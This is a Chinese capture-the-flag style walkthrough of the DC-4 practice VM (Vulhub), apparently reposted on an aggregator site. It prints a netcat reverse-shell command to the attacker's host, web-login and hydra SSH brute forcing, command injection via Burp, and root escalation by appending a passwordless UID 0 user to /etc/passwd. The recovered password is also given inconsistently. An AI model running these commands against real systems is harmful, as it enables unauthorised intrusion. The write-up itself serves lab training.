Vulhub 练习 DC-4靶机完整复现

1.工具

kali:攻击机 IP地址:192.168.200.4

DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

二、信息收集

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

1706592913_65b88a913813e9b2dec95.png!small?1706592913890

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

1706592924_65b88a9c52a3eb3c4405b.png!small?1706592924870

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

1706592937_65b88aa948833010fa352.png!small?1706592937787

3.后台目录扫描

1706592944_65b88ab094bd32d6b957f.png!small?1706592944921

4.网站指纹

通过以下两种方式可以准确知道网站的框架信息

①先登录网页,利用火狐插件查看

1706592955_65b88abb1efb99969b728.png!small?1706592955592

利用kali中的指纹识别命令whatweb扫描

1706592962_65b88ac29e151cc615488.png!small?1706592963006

网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行

1706592970_65b88aca7b0454718df45.png!small?1706592970831

3.爆破密码

①暴力破解

1706592978_65b88ad2e641ba8d8dd69.png!small?1706592979356

得知password:happy

点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包

1706592865_65b88a619554e77caf9f3.png!small?1706592867523

linux中的操作指令

1706592993_65b88ae1a23328c0fda81.png!small?1706592994155

试试其他经典指令,比如whoami、ip addr这种的

看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)

1706593003_65b88aeb228fba19227a8.png!small?1706593003662

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改

尝试修改一下前端指令

1706593013_65b88af51998e238b7a6b.png!small?1706593013671

一样的效果

1706593023_65b88aff7f21470e498ff.png!small?1706593023818

三、反弹shell

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

1706593032_65b88b087c978cf9f3c87.png!small?1706593033269

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

1706593043_65b88b132848d6363c7b4.png!small?1706593043663

3、回到kali,这是低权限用户

1706593051_65b88b1bacefecc020cb2.png!small?1706593052305

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam

经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空

1706593061_65b88b250643adbc8d5be.png!small?1706593061535

这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中

1706593071_65b88b2f1a10650ab2630.png!small?1706593071425

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码

1706593080_65b88b383c39ce1208b2c.png!small?1706593080994

账号:jim

密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

1706593089_65b88b417df183dd8f87b.png!small?1706593090124

1706593097_65b88b498835475b27851.png!small?1706593097886

进入 到邮件目录

cd /var/mail 里

1706593104_65b88b502f8ef7d368a16.png!small?1706593104693

结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限

1706593111_65b88b576f905597dee92.png!small?1706593111870

权限提升

先用sudo -l看看自己有什么权限

teehee这个用户是不需要用密码登录的。

1706593119_65b88b5f5851ba57be8cd.png!small?1706593119727

四、提权

添加一个无密码用户,并使用teehee执行写入 passwd中

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)

**
添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中**

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

1706593131_65b88b6bb8b50cf5b1d0e.png!small?1706593132309

无密码直接登录账号admin

1706593138_65b88b7240b4849601536.png!small?1706593139722

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/695618.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ChatGPT调教指南 | 咒语指南 | Prompts提示词教程(二)

在我们开始探索人工智能的世界时,了解如何与之有效沉浸交流是至关重要的。想象一下,你手中有一把钥匙,可以解锁与OpenAI的GPT模型沟通的无限可能。这把钥匙就是——正确的提示词(prompts)。无论你是AI领域的新手&#…

不要抱怨,不如抱 Java 运算符吧 (1)

本篇会加入个人的所谓‘鱼式疯言’ ❤️❤️❤️鱼式疯言:❤️❤️❤️此疯言非彼疯言 而是理解过并总结出来通俗易懂的大白话, 小编会尽可能的在每个概念后插入鱼式疯言,帮助大家理解的. 🤭🤭🤭可能说的不是那么严谨.但小编初心是能让更多人…

Windows系统中定时执行python脚本

背景:本地Windows系统指定目录下会有文件的修改新增,这些变化的文件需要定时的被上传到git仓库中,这样不需要每次变更手动上传了。 首先编写一个检测文件夹下文件变化并且上传git仓库的python脚本(确保你已经在E:\edc_workspace\data_edc_et…

一键安装ROS适用于Ubuntu22/20/18

一键安装ROS适用于Ubuntu22/20/18 1、简介 ROS(Robot Operating System,机器人操作系统)是一个用于机器人软件开发的框架。它提供了一套工具和库,用于机器人应用程序的开发、测试和部署。ROS是由美国斯坦福大学机器人实验室&…

笔试题详解(C语言进阶)

前言 欢迎阅读本篇文章!本篇文章通过一个笔试题来加强我们对C语言的理解,希望对你有帮助。后续我会写一个栏目,集合我见到的C语言题目,进行分析讲解。 1、题目一 判断下面程序的输出结果:(下面说的地址4/8字节是因为对…

Docker部署Halo容器并结合内网穿透实现公网访问本地个人博客

文章目录 1. Docker部署Halo1.1 检查Docker版本如果未安装Docker可参考已安装Docker步骤:1.2 在Docker中部署Halo 2. Linux安装Cpolar2.1 打开服务器防火墙2.2 安装cpolar内网穿透 3. 配置Halo个人博客公网地址4. 固定Halo公网地址 本文主要介绍如何在CentOS 7系统使…

JAVAEE初阶 网络编程(十一)

HTTP协议 一. GET和POST方法二. Post和Get的区别三. HTTP协议中的请求报头部分1. Host2.Content-Length3.Content-Type4.User-Agent5. Referer6.Cookie 一. GET和POST方法 Get方法应用场景有很多,比如下列这个例子. Post方法主要应用在上传和登录上. 一般来说,Get方法没有body,…

百度百科词条在网络推广中的六大作用

也许很多网友都发现了,在网上查资料,百科词条往往是优先展示的。一方面因为百科是搜索引擎自身的平台,另一方面就是因为百科信息权威,网友认可度高。所以企业开展网络营销,百科营销是一块重要阵地。 也有的企业认为百科…

Autosar-Mcal配置详解-GPT

3.3.1添加GPT模块 方法与添加Dio相似,可参加Dio模块添加方法。 3.3.2 创建、配置GPT通道 1)根据需求创建GPT通道(即创建几个定时器) 本例中创建了3个定时器通道:1ms,100us,OsTimer。 2)配置GPT通道 配置T…

Android全新UI框架之常用ComposeUI组件

在Compose中,每个组件都是一个带有Composable注解的函数,被称为Composable。Compose已经预置了很多基于MD设计规范的Composable组件。 在布局方面,Compose提供了Column、Row、Box三种布局组件(感觉跟flutter差不多),类似于传统视图…

​LeetCode解法汇总106. 从中序与后序遍历序列构造二叉树

目录链接: 力扣编程题-解法汇总_分享记录-CSDN博客 GitHub同步刷题项目: https://github.com/September26/java-algorithms 原题链接: 力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台 描述: 给定两个…

如何使用ArcGIS Pro生成等高线

无论在制图还是规划中,经常会使用到等高线,大多数情况下,从网上获取的高程数据都是DEM文件,我们可以通过ArcGIS Pro来生成等高线,这里为大家介绍一下生成方法,希望能对你有所帮助。 数据来源 教程所使用的…

PHP WebSocket:技术解析与实用指南

本文旨在帮助初学者掌握在PHP中使用WebSocket的关键概念和技术。我们将深入讨论从建立连接、绑定到监听等各方面的操作,并提供易于理解和实践的指导。 一、socket协议的简介 WebSocket是什么,有什么优点 WebSocket是一个持久化的协议,这是…

洛谷 【算法1-2】排序

【算法1-2】排序 - 题单 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) 鄙人不才,刷洛谷,迎蓝桥,【算法1-2】排序 已刷,现将 AC 代码献上,望有助于各位 P1271 选举学生会 【深基9.例1】选举学生会 - 洛谷 题目 解答…

二.西瓜书——线性模型、决策树

第三章 线性模型 1.线性回归 “线性回归”(linear regression)试图学得一个线性模型以尽可能准确地预测实值输出标记. 2.对数几率回归 假设我们认为示例所对应的输出标记是在指数尺度上变化,那就可将输出标记的对数作为线性模型逼近的目标,即 由此&…

投简历这样投就对了

相关文章 写一份让HR过目不忘的简历 后悔没有早点发现这篇嵌入式简历模板 了解校招类型 投简历这样投就对了 前言一、线上投简历需要注意的东西1.线上APP投递简历(以BOSS为例)(1)填好个人信息(2)注意打招呼…

堆的结构实现与应用

目录 前言: 1.认识堆 a.如何认识堆? b.大根堆与小根堆 c.堆应用的简单认识 2.堆的结构与要实现的功能 3.向上调整算法 4.向下调整算法 5.向堆插入数据并建堆 6.堆的大小 7.堆的判空 8.取堆顶数据 9.删除堆顶数据 10.向上调整时间复杂度 11.向下调整时…

rtsp推拉流

1.搭建视频服务器 smart-rtmpd: smart_rtmpd 是一款 rtmp、rtsp 服务器,非常好用,解压既运行,支持跨平台,无任何依赖,性能和 SRS 相比不分上下 2.推拉流 下载windows版本ffmpeg,并设置环境变量. 推流 ffmpeg -re -st…

170基于matlab的DNCNN图像降噪

基于matlab的DNCNN图像降噪,网络分为三部分,第一部分为ConvRelu(一层),第二部分为ConvBNRelu(若干层),第三部分为Conv(一层),网络层数为17或者20层…

制造业客户数据安全解决方案(终端安全/文件加密/介质管理等)

针对前文制造业客户数据安全解决方案(数据防泄密需求分析)提到的泄密风险,本文详细介绍一套完整、合理的解决方案,通过该方案构建公司数据安全防护边界,自动加密、全方位保护数据安全。 PC端:https://isite…